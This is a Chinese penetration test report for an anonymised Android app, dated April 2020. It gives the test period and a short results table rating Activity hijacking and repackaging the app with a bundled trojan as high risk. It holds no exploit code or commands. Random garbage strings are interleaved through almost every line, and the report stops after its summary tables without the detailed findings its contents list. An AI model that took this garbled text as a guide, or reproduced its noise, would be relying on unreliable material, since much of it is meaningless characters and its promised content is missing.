6 P6 E1 t) ~+ z) [! C1 n
" M& D9 S! P/ z- K! A; n s- h0 x2 T6 o4 k) I
/ w0 n$ @% S1 @, N, Y# O
0 M: D1 o% D( z/ Y; I2 u& x
& g! T3 T) j7 L; u6 b) v0 [
3 N# J2 I. a' b/ Y1 P" {. R0 E& p, c' |
5 N2 m l; G" D, H3 @
[& r4 ]: o+ N& ?
6 Q1 `) l) L$ {( N$ @* X# C; ]
/ u9 T( f7 E: ~1 p/ [ 文档编号:
2 `! w- ^) j! G" {* q! H& S0 E2 B' h' U) L2 P" @* P: R- N
. {6 I. H: r+ z1 v
) z6 L* v- O& O" D
. s' B" W0 l# K, a4 g6 N' c! k" E3 F5 M4 r
8 i& U$ X- B, N5 m5 ^6 e7 x
$ {% F# {. t! L( w0 L1 x5 A. {
& Y( k0 V. m$ B2 |8 }& Q0 h+ H/ D; `, ^5 X! c" n8 f
# L* E. f, T3 ~, n. Y6 E) R! ]! ^6 x$ _ N* S9 A
7 k3 d9 I" c( A" u* N! X$ o6 z w$ E2 c4 R( O
1 Y8 o$ j" M7 J9 U* X9 \% r
6 j5 ?+ X. \+ k# @3 J " {, Y7 Q1 k6 `7 b! T- j
3 p# t+ K" \2 K3 s
) c6 S; g9 P* R/ ^
0 u0 r k! w4 B) O) p% g2 L
5 d# x. a. D9 Y( l' v6 s( A2 [* [2 Y, l( ~3 T& K8 \
, X& k5 f3 S# M+ Y
9 i/ d- y: ~$ x/ z 0 l% S) Q" c% a8 @5 k$ s
: q) {' u0 P6 _2 `8 o+ n' f: ^/ m a
. _. |0 r- {: _ z0 X: v2 L$ Y) A6 s
/ [ y& A8 h( Z
' z, Z: T7 }6 S
9 v3 |/ S0 f) w9 F, c' V6 Q" C9 @) K
5 n. [/ B* B, R; k
4 O# z5 X9 D: w. s" D, D
/ x; B8 d( ^, {. B
, p2 t) |6 e5 ?* q6 {: E 某某某APP渗透测试
! l& K# D M! W5 B5 g+ @
, a( D7 W) u: Q% ~8 Y$ d5 Z
0 E& g" n) E+ k+ {
( c) G# R' B7 t' t" k0 U/ T4 n 2 @& Y, j: p2 L$ g
. Q, `3 ?" r+ s/ j + |7 G0 D; R5 C5 ~% |7 Y! K2 g: f
" H3 W/ F( n6 g9 [
( f; R1 o# x9 r! t
* t- f' t! z. t, M & D5 r. a: [8 D. V* v* b l6 T/ ~
8 S! s3 h3 g) C# R. S; R$ W7 b9 A' t
/ J% F2 G. d* H2 i! \8 a
2 U% ]/ J6 h" e- i3 C2 e7 D
* Y. D) b+ o- ~
( x+ D8 I# ?7 D
5 D/ a' r( G! p9 M H4 K
; w; D1 H' h( v/ r- n , `. l( R9 T/ d: R* S" P& e
; G2 _$ q; Z* s$ h' d
3 [+ J, M0 f5 ]4 ?0 o
% g; f. Y3 a9 V+ h7 c+ v, Q
) a; M7 o0 F `0 E
: Y( ~ o$ [% d0 }
! ~6 @( O! @0 B1 u3 n1 I
! O. z9 z+ s: Z, w+ k
6 r8 z7 e- W' ^6 i
" Y, @* y/ u2 b$ z5 ] 7 p; X% {+ a @0 M' A9 ?' U
' X! c# N4 L$ n8 C6 g8 w
技 术 报 告
L2 a4 n9 t8 t+ [9 B d1 w0 ^4 I/ R- B, [7 ^
9 e( J' E7 { i( p8 M/ n
9 V0 D- r$ e9 B% Q. Z! Q2 Z' M
" I& m0 x4 W6 W. e, Z9 E( i7 l; h0 }1 B7 [5 |2 R
" m5 V% ^( l/ ?7 Z* F0 L
8 O1 S4 Z! y% Q3 I2 N
' [/ A9 e5 d' c; s$ U
' A4 v: ^: o7 d1 t/ I8 e9 S# {) z
! c) M3 x3 F5 y
$ ^6 b3 t. n0 t2 k- h6 ~
8 q: k5 G6 b3 v/ o
0 @7 A, D& r, |9 H9 m
" I* i" Z: r, X+ @' E2 m5 U$ _! x
6 U* t. J! f; a1 I J. m9 M J' M/ S! R
# W; `, s2 q+ x9 R5 z2 d
$ U! h/ j3 N* w4 t1 V# G5 G
9 g, G6 _8 |- ^
& B ~) C+ j: A1 O# |
7 V( X: T0 K4 F" a, s* |9 L $ k5 j: a( t9 r) `" m, k! o, {
1 [- N9 |' c# @3 s; E3 z) v
# D# c1 G) @- w/ J0 N
+ d9 i+ t7 ?8 y' z: ~, z3 P
) K+ m( @" \* X* n) a6 x- |
# v* z8 ]; k( i `& M8 Q& u" y+ [
* C6 y, v8 v4 ^! p, ]8 V$ X; N. d9 Y4 Z
) ^- n- Q( h2 ]# i; ~
& B1 n' `8 i% X! p
* G7 b" i. `& ]% B
+ I% e6 \$ z* M8 i, c& @
6 R9 F* X5 m$ R
+ Y- I% ]* y* W" y6 ~
2 k/ A/ k3 N+ |1 f: ?3 y
- x4 d$ E2 F8 d4 @
4 o$ o; T, p8 Q1 M% f
3 m& F% U5 U! U9 Y
$ k6 Z8 \5 J$ Q' L
9 y* t, S+ P- h8 ~
7 h1 H* c( ~) h6 U$ [" r) s5 m: i5 `: l
- g) x' v0 Z; f) W5 Z: I$ b1 L* Z8 f( B$ o8 y$ J# U. ]5 ]- n
# y0 |9 j2 A l+ C4 Y
( I8 d7 x% d- a, a
9 G& h6 t2 k1 {; P' o
1 z. c4 e9 H8 l
% N# ^* M' i( z7 P: q. _$ O: X* ~( z: t
! ?) m# k. n0 P2 o) l
@7 b1 c4 u: d7 I2 a- k8 F4 v% N
& d: w$ Q; `4 A0 {
1 M. C/ P D) i: @" P( D
% ], o+ `' n& Z- W8 P
; E: E7 a2 x/ z # E @/ h' K, \' [
) n# n( |4 _5 Z# K' z) B 1 n; p9 z" F' u, o9 @* D
$ r( N! m4 a% N5 L/ B
% J! d; a9 z9 i) r5 v7 S
. V4 g# x/ w2 T
9 Q) a+ @1 N+ x% P
7 h# E" K t8 w* J2 F9 ~7 E
- D X2 A( ~, l* {: C- c7 {/ ~5 ?8 J
% N5 `. \. T4 g3 j9 A' b9 P
% N d& n5 a+ ~; x O- C7 n4 v * g! [! Q; c$ ? Y- _
; ?* R1 k9 j- Z% L9 U
; F+ d) m9 Q/ {9 v! c
$ T( r; B# e' y! J% n& d' N; {
& [" i M V/ f/ S, }/ j4 p4 }! C6 u" t
) ]- b8 _% t9 s r5 ^- e3 c
! l" X; ~* K8 p" G / G2 i8 Q. Q" T
; g# Z8 G$ [# i4 H* t6 m7 f1 _% n
7 D0 z. A8 G: w1 ]2 y) m; u+ V2 _8 A# J1 G
7 D, {6 X8 R/ e! ^" h: Z
, k3 D2 g. t) d" `0 x : l& N4 D; m$ G7 s, y
3 ^8 a% P* }) v; p
8 s) g" v4 n6 V' h! K7 D: Q' Q; m# t |7 v8 |
% F+ D& U1 @) Q4 A8 v, U8 j
' ]8 r/ m9 K8 Y6 {# u) V. S0 } s ) a4 n/ ?/ Y) b0 D. p$ U
8 X) M+ P. d2 m/ }, F/ ^' }& k
' W1 ~, b! m; \$ M5 C
- m# P5 x' T! B8 g* X" P2 L- l2 r' p {
8 r: ?5 `5 e% N" I B1 d* [' }7 v T! r
$ j: p0 f( _( p4 v# G7 W# K1 q
( g1 F" j3 V o) f3 P1 ^8 F! Z1 |7 u
3 x+ x1 u2 j' B" z5 S$ Q& K
$ M8 _- a5 G8 Q* P" h
K( m; K7 m5 i! Y
" B2 t' v9 e, O7 r1 N n* C + t6 y4 X: c2 c
; ~% \0 ]+ O8 L- |6 r' D. }- }; D
2 R9 n3 f$ j5 E9 u2 W3 {
& f& g l2 x& v& `* u; ?
$ u4 b! I+ z$ a% p
$ J$ U$ {$ j. G& p ! P$ j, Y N5 e, ~5 x9 C$ X% s
6 }, Q& J2 ~# r6 Z3 b
! s; ?7 }1 z" x8 x6 U
1 ?: T: X- x9 A; m% F( Y0 H. C! w
/ L" Y. h5 _( {3 c& {/ A! I) c, q1 Y3 A( ^! l( R3 n4 ]
二〇二〇年 , u; S( ^7 Q% y. L0 {+ e
9 P6 D" U' I3 ^4 r* w% G0 m
, U4 Y1 n2 C( M5 \# p
9 s/ P' K) T5 g3 {( ]7 z! I G9 k
- s. A- a& p2 L, s8 y5 `) k5 t6 b2 B! {
% N/ @6 n* N9 N) Q( a6 J+ o. F
# M5 @, u' c4 C/ f. ?$ ]: _ 0 L0 x# d" ~7 z' V, K: s8 U
4 j) L, p$ N- h' }5 W7 i
$ }" S0 X( K# l
5 z6 ^+ r3 t4 F* M3 v0 C) A# `
, i X3 Q" c: ^& H) [
( [1 \7 p( ]% l2 |5 Q! X
2 I% H/ I- a9 ~
; |6 V+ E# y3 ?/ b) R 8 w. ^, t7 v( y4 C% j6 R1 E
+ K! f( |8 c8 ?. N
8 {% P6 Q3 s' z" t) \/ z" [
" V! x; L3 y: f- k* X L
: K' Z; m/ D$ s: y* x! n% a' x- i8 ?* N
目 录
- d8 d* [* y0 q1 x4 C" g; W V8 H4 C7 R6 i5 W+ S1 J$ f
5 Y& D- H9 P" Y' K% q, O
. o& f( z9 U8 |2 `0 Y
1 M% }8 M/ y$ `4 S5 x l
# D# i4 M j6 p( U) ]: b& a
5 @% R( B( j; W$ S ?
# r+ }' ^) t) G5 l+ U- l* l
1 n5 }6 J* |4 E$ H9 G
7 }- `; x9 |; w# ^: z7 E4 `$ g4 _/ ^& V
& ~4 {8 {7 g- _0 W5 Z2 k* M! E0 M7 B/ w# J5 A
8 P$ C' U9 A% r
& ^ n2 d. U2 d/ I2 ^$ D
1 概述... 3 1 ~5 m, Q5 i- ?( \ @
' b& p" l- l' M1 Q% ^
/ A) F4 [+ c2 ~% z$ L- V
- c: g, D% J: }% d! d# ]" `
) \" [& e3 a, Y' l3 r* r
, k5 P! K4 w) \" k/ G# p: c 1.2测试时间... 3 ! l+ o4 s( E' Z$ o. J) x
, f0 d1 c3 i7 p0 b z. o, r
) G; Y1 d1 `. [$ r2 Y. n2 T, M! r3 D& [
+ Q( ]" e* Z R
- e J5 R7 g9 ~( D5 Z g 1.3测试对象... 3 0 F: b# g8 C% G4 B# _2 r
) C+ f) q8 ]# u; F6 d$ T: i: U
! ?5 s7 q: p( ]0 i
* Z" k& j) Y6 ^5 V/ x( c* N
7 C/ e, S3 \" H9 b- v! |6 E( X
( d2 k& G3 v9 `$ i, c: n4 F
1.4测试结果... 3 3 u1 B( C6 |* W* @* ?( T
( K5 n3 J1 U' c: y- h7 c
3 }9 t- |. w, X0 ^
( q' k6 `0 [) _. M
0 Z, Q0 ~) O9 T q; L6 \6 J8 b, L' O2 d5 t9 H
2 检测结果... 4
. L+ t% l% _# ~/ W" @* X. ^0 ^! V$ P! [$ R
' Z* l+ }( e+ D# v \, F
6 x! f6 _. @ l6 ` S5 v 3 N: J$ d9 C; _5 t: \9 C& a5 m
) v) [9 Y0 E) d4 U$ F
2.1 某某某... 4
1 `$ T$ f, I# [) b6 o
9 J6 _2 m6 r9 \& b
2 Y( G5 E' R9 }. I" x* m; F& o
+ w# f& p7 D7 a0 d
/ n( q* A& S8 T0 \8 {' U2 K P* ?' _# v2 _+ T# }) Z H
2.1.1检测目标... 4
3 ?- \: P Q2 U* J0 b( i' r$ _+ {, Z
; c" O5 Z" S/ G/ ^ I% u0 r/ `
: `5 u/ b* f, N Q3 H( O: p0 X
. i3 e& Z/ A: U! c8 h
2 B6 B" t3 U5 G 2.1.2检测结果... 4 , B0 S. V' G+ V1 ~ i$ J- f) b
( w7 x0 a. J: V% f7 i2 `
7 l2 N( W \: x0 M7 ?
4 O2 Y$ P9 U* J. Z 1 q2 ~0 [$ }7 q$ y. A% T9 V) x
/ m" Z- p k5 r9 |' A 2.1.2.1. 4 3 R' m* i4 a& P0 Q
: |& [2 M0 ^: V2 g8 m
& V5 }* s) I. S' ]: L
8 O# U" e6 V3 E/ _+ `
; S* W1 @ [/ I9 S/ |
- S& J ~+ i$ D' a( n4 X
2.1.2.2. 6
% ~9 v- u, s8 `7 S; u; [; |4 L- D( j3 h% E4 R
\* b- \: }& K" L+ W$ q3 |0 d: b& @5 `# L0 }6 F+ h( G
6 n( g8 d7 C+ E
1 l" H0 l1 X2 P$ c/ f 4 H9 \; `/ T7 {/ ^4 `+ Y) l
* M J; i9 Z5 Q2 y" N, V
! v) P1 Y9 r6 Z8 h# y# s
3 a: b. L! G1 K& x! @, i* }
# ^! N% Q9 P3 V3 a
1 m* e" }2 R& R" g/ n2 \& ` ; B: e6 f' x- z) }
/ r5 h/ r0 v. y7 i* F6 v
- ]3 D5 }4 }. a( ]; E
1 X( ~5 }6 T) O$ O % e& `' M) G y8 H* X2 a `
& X3 R8 l! p) m, G( i" t
4 S n( M- h) t ?$ \
# ]8 H+ F; i7 l1 P5 X 1 概述
4 b# Y$ ^4 t% ]- C; l) R' ]# y1 U) k+ J3 `! H1 m2 f( X' c1 I
) H& |1 \9 F& j. Z: d# n+ A F# _0 K
2 u! D5 b' T9 | W3 `% m V+ v
; \7 p8 S. r# X 1.2测试时间
" r" n" I% Y3 V( |7 A% L0 J1 r- @' J Y. g
`! _4 y. [. Y3 o7 Y) B
! U1 J; a" R4 P0 v- q! Y
( o( X1 z4 |) s0 V8 |) v3 `4 i9 \! J) c9 }. V* L
8 O& T; a$ D. `& t, H
. C" G2 b* o1 l! E" L4 E/ ~- G
+ j$ Q; u5 K1 _; U4 C2 l) H
& W) ?2 X4 q, l0 N2 L$ [
| 3 D3 h: h$ r8 n, }
* m- V+ C: B7 h' P8 C; K
. w' w9 s! I$ Z( ?" o/ U# e4 a) H, j# ]& J
渗透测试时间 & Z: a' V9 b& L3 Y, V/ t1 o
. v6 V1 y) g+ e* {% N - L1 Y; e3 T2 k& B- g6 I
, d" X Z) R9 i | - {# O, d/ C T9 w5 Z% k: s8 u
% D: O9 _( i& n/ j' {: ^
# z. V9 Q. u( H9 {/ G( `- s' E/ C( D; R* f( O1 B0 ?0 z
/ e9 p: V4 R; f- P, E' ~. \
* Y6 w# V0 K% n! } | * c; w9 V* L2 P# E; U( L5 C9 n
N9 o3 i. \( U
w+ B5 n, P8 G1 l, t
! o: }2 c0 |: ~0 e& x1 l
起始时间
! o7 v- f0 j# N w5 [
' |0 S" p: H) r* e- P1 [
$ p$ y4 [. [0 {5 P1 e i3 ]1 p) o4 c. c* P6 i9 F
| + ~( v" i" x0 O; Z
: F5 H* j+ P% l! p7 t1 G8 x
/ J* Y5 V/ C9 n, z
7 H% @! }; g" o; f- k2 e6 | : t h# ^7 D. _. j7 C
i" w4 }) D# x/ A 2020年4月6日 9 j, F0 O; p1 k+ W
& |/ T% a% s$ {! N. _
# s4 K6 o! c/ F8 W" K& t- f# W
" y# x, ]) F l; | | 4 ?% C, L0 Y; \' j
O/ B I* Z$ \2 l: _
8 i3 Z" j' m; U U' p7 H
4 K% o4 T0 v/ G1 \5 X# `
, W' m5 j7 k7 n5 M# @$ _: A- b- U
M }* H: j' ~6 _, _% a |
, L: q- V5 L$ `0 [% ~! J* Q+ U, {. J
x: \' u) w- p0 |6 v
& v5 A( X3 k5 \. ^3 w/ F+ W
结束时间
+ S& G% t" n& J2 [- o
! `5 C3 S/ T ]+ F+ V6 z" v/ U u( J ; W' v) t! U# q1 ]3 B4 P; b4 ^
" Z" Z& y7 g* m' M
| 4 L) [3 u% [/ _( u
- q$ _/ C. p. D7 V0 n, I1 I
0 S" [, w2 B6 i$ x
* { V2 J4 K" M$ r, k8 \% I% Y
; K7 u1 k% i5 R2 y! _
$ _$ V; S1 {8 B8 o. d5 a 2020年4月9日
9 z. c9 l, O! X& }$ ? h) d
3 }) H6 m6 K- u# @ 2 i f( ^9 i9 D- ?2 @2 p, e
! `% d/ v/ O+ M2 u: s
|
8 h8 o2 z+ |0 K- D9 q
3 I; w, Z. E& g
- g9 _4 I X2 c
' P& S: q+ x+ j" @ / \+ K0 @1 ^2 X9 s$ h, G5 ~: K3 Q$ P
( a4 Z) R3 {) h5 o: g, j/ T
' Y+ P" V$ Y, h- s) Q
6 e3 R2 \+ Z! v" ~1 ?+ A
6 ?& c4 ^/ I( B" N1 j7 _4 T0 |' f$ P5 _
1.3测试对象 1 u# j% T. p6 N8 ~! x3 c& v
) h' Z+ {% E, U& o: R
9 ^: E1 H6 b$ N3 W( t
- x0 m3 W" f* S' d+ A$ j7 B3 z
/ E) T7 h* C" Z# ?1 F$ k
0 m* L, X. b) ~- Y0 g! C 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
3 _, g6 a! n; u* Z7 ]
, Q% `. |9 ~% j( y
: y4 E/ u+ x. _& b& q, A |3 G* R
" ?7 C; {1 B9 Y$ R' v$ d8 b
. B( D. B5 P; U/ G ^5 y% h9 k$ ]4 x5 y6 _
表1-1 检测对象 . q& W$ ~+ Z! q3 a8 m( q
- Z! A' e) q) S4 G7 Y
0 ]5 ^, y( I4 x: x% J; i* \
* o' U4 U7 t% k. V" G7 W2 B
" X. h3 c# }$ L; V: k8 p) z0 G
3 ~/ ^0 Y! R3 }9 S1 j' h
5 A6 z% {- ~" {8 W/ r8 }5 E, j7 L, @# H1 ?+ B9 `7 u& R
+ p/ B) T3 Z8 v1 X# z, X
0 Q: w/ G) b, P | + N m; Z, U; l0 K
9 j J! [% R4 f% O4 V+ a; l+ I0 E5 b ) q; y; J9 E& l8 i+ q
( s4 m2 a8 |0 I3 ^! {& b 序号 % Y% ^% z& P* e' O s
+ E0 }7 j% G9 h- }1 z7 C7 b+ ^3 Z& U: \4 ^
9 \8 J' y0 m/ `. i# k
5 @7 {% D7 G' ?7 ~$ \- e | ( B; C& [$ X. N5 i$ v: R N' z8 D
6 U' j% ?' K a7 w+ Y ; | v3 W1 k3 f1 S: n" y
) t8 ?' I* N" q( m& M
4 D, B8 f4 f w
6 N& s3 N2 B+ d+ h4 `& ?( I
测试对象
, L! B- [$ a; c! ~- H8 p R
# w/ n/ h5 X# N( R# q4 v8 D7 M 1 G: k' x! o4 F1 r. S
4 y8 W$ c h2 Y- ]( P' u
| . C& w" b. S$ |# r1 x2 p' }* ?
6 ?$ {8 v0 F- t- ], {8 \+ N
+ p. i9 s2 z+ B/ @4 {% V O5 u8 J1 z" }/ N! h* T
9 o+ J. R) m$ m G- W! {
- u* _0 b( z3 W6 m) y$ T 测试地址
8 m9 t/ A& t6 S! |
$ w1 _) a! c* t& r w, A0 l
( P* \$ R- F- `* \$ U
1 ]: l4 Y' |/ z' V |
" k/ b/ r0 Q2 s% E
9 d% a" O8 o1 v t" G' S
* d! N+ f( T3 q, M3 G% `) ~) S5 E( K; N. \3 c: M
* q* ~8 I0 G* e, [2 }0 d* x3 q. e6 C# I
- a+ e- z/ b1 V0 Y3 x 安全漏洞
/ B: |+ o1 V$ H+ j. o# x2 Z5 Z# E* @8 V* q9 f
' w, }* Z& s n' S* ^0 A
! \8 ]& A( h4 o( G9 g |
& T+ S6 H2 {4 j6 W* s' m1 E; t! F+ g2 b$ T" q8 x* o
( Q# ^+ [4 u- c! I; d7 s# }: B# i8 I
1 n$ x+ s4 g3 E( P! z
9 U; r& d* A( ~$ n7 y, X |
( {( y6 D1 f) J/ G$ { m- u5 l/ e$ d3 z: n" h' B/ Z
" P7 q1 e1 I; E% Y' S; B! Y3 q0 B9 ]/ y
1 ! f; L6 |2 L4 m, b+ p6 ^ B8 r
W# O! x" G1 ~
6 S, O. B8 g8 U+ P2 b' r8 x: x
% r. F Q8 g: Z
| 5 `+ f r: H8 s' ?( H
# K* C: Y: [8 e0 m
1 ^2 F3 }8 ^) A; U/ Y! b
) ~9 M9 b$ ^" [$ d
; M# h; L% _; \6 f4 T u
9 P% G- A, F( A; S' ]; ]- j 某某某安卓APP
, @- j6 \2 Z6 ^% m+ Z. a9 T4 ^/ \& G0 p
2 m. `* J, s( X) ?' ~
/ C* g5 c% a( {0 ^
| $ R% Y( H( k" ]" X+ [
# o3 Q. v( Z" L
$ L4 O, m' g% G, g; \6 A0 K9 ]. l9 j2 h/ Q; i9 \/ P
4 J6 z. ?2 e$ j- }2 K& N
5 a" A6 O" ]! `+ ^. s+ @/ w
/ w8 a9 A) B# Z; i; G
{" ~! h& U- n( V7 q
h7 x' N! t" U: ~# z9 P
" I/ _1 a7 f- v/ I# O$ C: c+ p |
+ j$ {( D, I' U% S# @1 b7 X6 Z9 b2 ], g# L0 _
* |2 R: a# H8 r: }
% S; u: ~# ^) ^7 C* t* U! w# h( p, N" }
. R# ~. x) c. w8 u
9 p G9 V0 i, S4 S6 k 2
$ A# r. n2 d4 e1 w
& P0 U6 ]$ j v, o. _ G 7 y- e/ y( H$ ~4 f4 ?# }% }" n
. [( k3 X9 y. s# M2 c0 i; N* a/ } | ) ?8 I- ?4 s- h6 C
9 L2 g; O8 u) l& W. L4 O3 g
$ l) r! u! R6 n% U
" }, B3 }4 F5 Z# G- }0 b% D & u4 @; i1 p) s' ~/ f T3 t
$ d9 V8 {) H! C4 x+ b- ]
, W* y& w$ N" \. c
. X" r! O% L8 J, k1 t1 V
8 @+ A4 Y% V+ ~ ~ E \0 e l* r* m( W. p/ j4 x. r
1.4测试结果
0 R8 V0 T' H) `7 c* z2 O* X" ~" W& X
% D1 ]- y0 e, P, o
) k! R9 B3 ?& H0 i) l- J
0 U5 S1 z/ L. |" J+ _! |1 x2 t* |5 I& n% `2 f0 u* Z' s$ e
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
5 B4 R% s. o' t6 T0 l! x x0 m# u1 k6 i, l
: Q3 }, N) a3 |3 s) T. S1 r
V8 \- n' l R$ H% d( D- u7 V
0 a1 d' h, G7 P6 ]+ @. W( k
+ g8 o Z& W+ C6 y
# q7 f8 f& f! R( f! Z
+ q* X4 p ?1 T' ?/ q3 p1 p) v7 J" F4 ?
5 v v' ^/ b8 _3 b+ m. h) Z" f
% f1 q) u F2 O' D8 s& U
, u' f% \ Z k% W4 F; b
) T( Z4 [% b, @, ]
* y- {* I% S( x/ g4 ]( U, A* m6 ]6 Y/ Z
: n% B1 P6 @4 l, ]
3 L- _/ V# t8 d' }$ ?2 I. w. T. x) o q
1 z! V8 v% N5 k0 J
7 K; ^1 n' ?) h% F |
% ]& { W) s' W$ z5 q6 w# ^$ f2 `& b
4 p* n8 r4 b" W7 g; W; P
9 p2 w8 W0 O% e
序号 ! s! c; K+ W, H" W$ I) ~8 d7 Z# i
9 c! p3 t, W4 e# M
. S' ^$ }2 F! _. q$ u [4 ^& ]0 |
3 A3 [# d3 }( g2 ` |
. Y: Q* P. m: |. w7 f* w8 N
' ^% R. T% a1 e , R- m/ ~/ E7 S$ U. ?* V4 T
+ B1 Q5 [( }2 u
5 a9 ?+ r- B& k3 K3 o `
/ o; M& f2 ~: }, k! @( l z% D
系统名称 7 u0 |( @$ q0 R+ |$ U* O4 x
4 `; q, Q& i1 O
7 M/ u3 g' e+ p
: S) m: L6 b/ ?+ {; j' w# r
| 9 w9 Z% V7 g- l' G* \8 L) {
. u2 ]! z6 v8 N" ~3 [
2 t8 ~0 J/ Q3 q9 G
1 m/ T& O1 W0 l% f' b- X' k; u . C) [8 @$ Q0 b" X1 t4 M6 x" b% i+ \
; a. @# U- }! S2 p/ H
漏洞名称
0 f( l' Y4 Z2 n% E( v+ M0 b6 q9 d
' p1 M" W9 L" A W7 q; [1 S6 {" p 1 {/ S& \5 }7 z6 E3 c! N' ^! x7 a
( l. j. {* Z8 C5 p0 [* U- {
| 7 k/ Q3 k1 U4 P% W
, y7 a2 I. E5 A6 ]
& V0 \' u9 W: _8 e5 P0 G0 f D
1 T/ Y0 N- M, c2 F8 I# w, L & O3 n1 ~) ]6 g
2 L" J1 ]2 u8 `2 Q& O
漏洞危害
! f8 f9 N% R2 S/ q0 P. {- W9 a& q( s* Y) z
0 ]; ~! p- {$ W: E/ @6 O4 [+ m! c, u
3 x7 c; F/ `- _( k
| " e% W& ~# L, n* U% j5 d, C0 Z
' Y) I0 x# v6 W8 W2 a
: n; S" |$ D6 \( j
7 e% L+ ]$ P3 p& d
! L* c \$ M, ^7 Z& f) I# z' x. G0 I. `
修复结果
$ t1 A3 C" E& T& J/ w) Y" u8 t6 E6 j, {" Q
9 j9 |" _( G+ m5 j0 u6 [1 y
; W& J# h# J B9 S! C, z8 N | - j0 @2 `* h( K5 |! i5 F( C2 B
; I+ m5 } r; p* q& H) n
% ^5 P6 p8 b8 {/ r" f+ ]. r6 t, J5 O4 W. s" \: J
2 l& O. t7 \! b" a1 |; R$ W5 _" Y- c/ o
|
: i2 I! a- Y9 L5 ~% k( k2 {8 D. z) r1 E8 \! y1 y3 j
6 U- h7 f! z& I: Y. C) a
" e8 @! W! V4 _0 m0 m/ q 1
7 P! }. h. |& G
+ A- C5 Y" j2 X- ] ' U) Q @1 O' A( G( n! F, l2 |
/ w/ W' ~- D( e |
7 d7 \! }4 j& t8 p( e, u9 D4 f
3 ~+ M' ?/ H7 C5 p" n2 D $ }: ^2 b0 B; S- l) P$ i
: x: Z5 e5 C$ t3 @( N 4 X. V4 ]3 V v7 T# h* ~
: I; r& @. O8 i6 p6 t* o5 J1 Q$ l( I 某某某某某某APP ' I2 p+ ?5 E" u, R$ Z
& L$ f" D, `: v- |% b U% w
$ Y" G5 ^ E: t, W& e: w0 Y8 j: |4 o* T
|
/ N3 U& T( }9 `) c" h8 i5 }* K
5 C5 G: `* ?+ V. A ' t8 x) H1 V0 G: D$ r
" n; @$ `; y+ C/ R; d: z2 z ( W/ b" P! X% J" M: L8 y& g
, n9 h6 X. K; M1 G Activity 劫持
! Z. w5 l0 c6 o% W5 X) ]1 y& n# c# x! S. R* a Q
: C# D2 E( h: \2 y) b$ f6 n8 X5 z% Z; t- g5 D
! L# h3 e5 g( }" ~) b
1 L; p. r* I8 @2 y
0 Y2 i7 k, p& |0 b
3 T6 @. ^2 i3 U8 K# S 0 \0 p* Q: k; n! i# M
9 ?; x7 a5 z4 }2 q* u
|
0 p3 t% T5 \5 |& A; h: U: L3 N( C3 u' y- Q
8 ]5 m4 a+ T* g1 D0 A0 {
$ @9 j3 C. U" L& |% T: S0 { ; R/ Q0 x& b- [
- `+ |+ g" B8 Q( [& d$ | 高
! E3 g, O; k' I I1 l9 Q) j& y, B8 B* r1 c& x5 z7 H
" X5 C: A4 n! l5 j) t7 C7 [" t) {
| $ d$ X2 G: x- q$ |* `
% U5 W: B9 B i. y a3 m$ h7 J% T$ z
! v; c+ W- o! _! \9 m, V
r9 r! n" u! C% N1 R
( F$ y& F3 m. Y/ o
( `/ e$ r7 K3 ~+ y* ^" K, D& \- N1 p9 z: |1 m! G
: ?# ]; p# ~+ b) ?' X5 J
3 }8 N& j. B! U/ x. w+ k7 |: I) L |
0 ~5 ]+ H$ G& w8 ]* O4 K7 n/ [- u% A- ~9 I, k- V
9 ~% b+ g* @9 A6 Z/ a
+ l! z4 r% Z8 Z6 l1 v( V3 ?! X
* j4 M1 I! z; J3 b( O# W% c, Q, z! {" g- U! u! C7 T
| U7 K7 M- B7 P: O
8 L5 f0 U5 w+ h3 m
- Q" ~& ]( {+ `8 E, r+ \5 I( k) d$ A5 y, r
2
6 D. t8 X* M! d: \- W% p, ~
7 D# k2 D. @* l" v& d% p , k, O7 x; V3 N0 B' K d& d; B+ A
( I, {2 }# F0 e& f- o6 e | 0 \5 p' ?% \! j: _
' |# q$ J7 r9 `5 _! S & r M% G! [2 B9 z5 C
9 q G) B; g; C( }8 q
* {, m8 b, \9 x/ f& b0 O& n) ?7 {
7 {' w- C# Q) J1 \; z 某某某某某某APP
1 t9 b3 H$ t \' }- ~% Q( ^+ e8 T5 L) h }/ ^' ^
, c' Z( D& T/ K5 b) {/ z; q- q
5 {' \" H; V4 F/ e% }3 h0 v3 ? |
& e3 s; \5 L4 i0 d) f. _6 W" n4 M& O; |$ g4 [
& i7 p/ T: l: p! Y# \
& \ O7 u$ D0 y- O
; z) o" z) B3 o# \$ Q
P& s( v: R2 g! V0 B+ v* @
反编译二次打包捆绑木马、篡改APP代码
7 Q/ u+ k$ E3 r' \4 q y0 n: ~
' M, o5 N. |" V0 j1 f0 c & Y. d. R2 Y* S8 b% b3 u0 o5 k
0 z- c# b; m! h9 h" L
| + }% Y6 { M6 J" f A+ C
' y6 Y5 N: y" b6 W/ q 1 y. {+ m% M6 F$ V, a
1 V& N5 x/ w# N& u9 o + I% Z) p# w; F4 f0 Q
7 |( K4 p) t% A( f% [
高 - \8 p4 ^* W; Z( ^4 n+ E' K* ~
3 G. r" S" S6 b2 k. K
' G* K+ {. G- J% c6 I6 i `
7 l2 @, `# {" t |
! V5 f3 [+ q" x5 ^
( I$ e8 y/ P/ x 0 \6 z4 h S* M8 {6 p0 u
* E6 b# V4 U4 M * ]4 w+ T+ B) L. p5 z* V3 p
( F; G* E* q3 L$ b. F0 N
" g" E1 u+ x" m5 @$ j. O1 E* w7 e R% x
; b, E3 q6 d8 P. m( _ i/ S
N* I5 t$ c7 i: |- M. ~7 Q; T; C |
4 R. l# S+ |1 U* i4 p' h
2 I6 I" ] t- E% k5 F9 {# b
2 a) K2 h o$ E& A0 |/ N
; J$ d8 V0 ?% A- w( @
! _; @" V! w5 d# Y8 G! S7 E' F; o5 P s Y* n& ^
( n3 `4 _7 x3 P- ~
5 Y: z) G; p2 q, ^0 S
# g! i5 V$ i) v+ b
$ N& J" O: u% H7 K. L1 u
& x; t0 q: z5 q3 H* z" N
- h! u2 |- K# A2 b l2 Y
3 `( b7 N, \% @. q, R. b* n1 }2 ]! N/ u( o
1 c$ j4 q3 S5 @. Z% I1 {2 X) }. `
& b5 l& p: A, g+ f7 e. R2 |
9 k: _6 L5 M9 u$ S! K: ^0 p* |$ i2 V
表1-2 测试结果 # t! H% u, b9 i. F) Q' K
& O' C I1 ^: i- I3 [/ S
% Z) h. Y u# I2 w0 y
) `2 `- u/ f9 G9 z/ }( S1 b 4 ], I! O0 m) E7 ?
5 l. j' d6 c5 N0 z# _ + w# q# b8 a/ \, F- G3 |
